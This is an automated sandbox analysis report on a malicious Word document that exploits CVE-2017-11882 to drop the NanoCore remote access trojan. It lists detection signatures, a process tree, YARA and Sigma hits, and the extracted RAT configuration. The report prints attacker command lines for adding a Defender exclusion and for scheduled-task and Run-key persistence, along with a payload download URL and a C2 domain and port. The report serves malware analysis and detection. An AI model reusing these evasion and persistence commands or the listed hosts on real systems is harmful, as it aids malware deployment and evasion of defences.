Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOC_MDR0307_019.doc

Overview

General Information

Sample Name:DOC_MDR0307_019.doc
Analysis ID:558855
MD5:0f99f373718685c0235b20df7624b00c
SHA1:1ed1e0a6b306bf8bee39628cfcfa2f8e683bec77
SHA256:adc82a58d8c890881cc7781be8e831b948dc06757664946ca302f2ef5200bd38
Tags:doc
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Suspicious Remote Thread Created
Sigma detected: Suspicius Add Task From User AppData Temp
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Document contains Microsoft Equation 3.0 OLE entries
Enables debug privileges
Document contains no OLE stream with summary information
Installs a raw input device (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to detect virtual machines (SLDT)
Potential document exploit detected (performs HTTP gets)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2588 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2792 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • plugmancdht5461.exe (PID: 848 cmdline: C:\Users\user\AppData\Roaming\plugmancdht5461.exe MD5: 7031570AA150B893F68A32900327B2AE)
      • powershell.exe (PID: 2644 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 568 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 62CE5EF995FD63A1847A196C2E8B267B)
        • schtasks.exe (PID: 1136 cmdline: schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 2116 cmdline: schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2136 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegSvcs.exe (PID: 1208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0 MD5: 62CE5EF995FD63A1847A196C2E8B267B)
    • smtpsvc.exe (PID: 800 cmdline: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0 MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • smtpsvc.exe (PID: 2284 cmdline: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "910523a1-2f72-4f3f-a340-f1a8b5f9", "Group": "PHADDY", "Domain1": "vijayikohli1.bounceme.net", "Domain2": "127.0.0.1", "Port": 3132, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 57 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.RegSvcs.exe.d90000.12.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      9.2.RegSvcs.exe.d90000.12.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      9.2.RegSvcs.exe.5f0000.5.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x4bbb:$x1: NanoCore.ClientPluginHost
      • 0x4be5:$x2: IClientNetworkHost
      9.2.RegSvcs.exe.5f0000.5.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x4bbb:$x2: NanoCore.ClientPluginHost
      • 0x6a6b:$s4: PipeCreated
      9.2.RegSvcs.exe.4610000.30.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x170b:$x1: NanoCore.ClientPluginHost
      • 0x1725:$x2: IClientNetworkHost
      Click to see the 156 entries

      Sigma Overview

      AV Detection

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Exploits

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.58.149.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2792, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2792, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

      E-Banking Fraud

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      System Summary

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, CommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, NewProcessName: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, OriginalFileName: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2792, ProcessCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ProcessId: 848
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788
      Sigma detected: Suspicious Remote Thread Created
      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 2644, StartAddress: 772DF523, TargetImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 2644
      Sigma detected: Suspicius Add Task From User AppData Temp
      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp, ProcessId: 568
      Sigma detected: Powershell Defender Exclusion
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, ProcessId: 2644
      Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 2644, StartAddress: 772DF523, TargetImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 2644
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\SMTP Service\smtpsvc.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Service
      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmancdht5461.exe, ParentProcessId: 848, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe, ProcessId: 2644

      Stealing of Sensitive Information

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Remote Access Functionality

      barindex
      Sigma detected: NanoCore
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 788, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://paxz.tk/plugmanzx.exeAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR
      Found malware configuration
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "910523a1-2f72-4f3f-a340-f1a8b5f9", "Group": "PHADDY", "Domain1": "vijayikohli1.bounceme.net", "Domain2": "127.0.0.1", "Port": 3132, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for submitted file
      Source: DOC_MDR0307_019.docReversingLabs: Detection: 23%
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeReversingLabs: Detection: 39%
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ZdNnwVcb.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJoe Sandbox ML: detected
      Source: 9.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.2.RegSvcs.exe.5a0000.2.unpackAvira: Label: TR/NanoCore.fadte
      Source: 9.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 9.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

      Exploits

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exeJump to behavior
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drStream path '_1704543374/\x1CompObj' : ...........................F....Microsoft Equation
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe, 00000013.00000002.463928971.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe, 00000013.00000000.461835651.0000000001392000.00000020.00000001.01000000.00000006.sdmp, smtpsvc.exe.9.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp
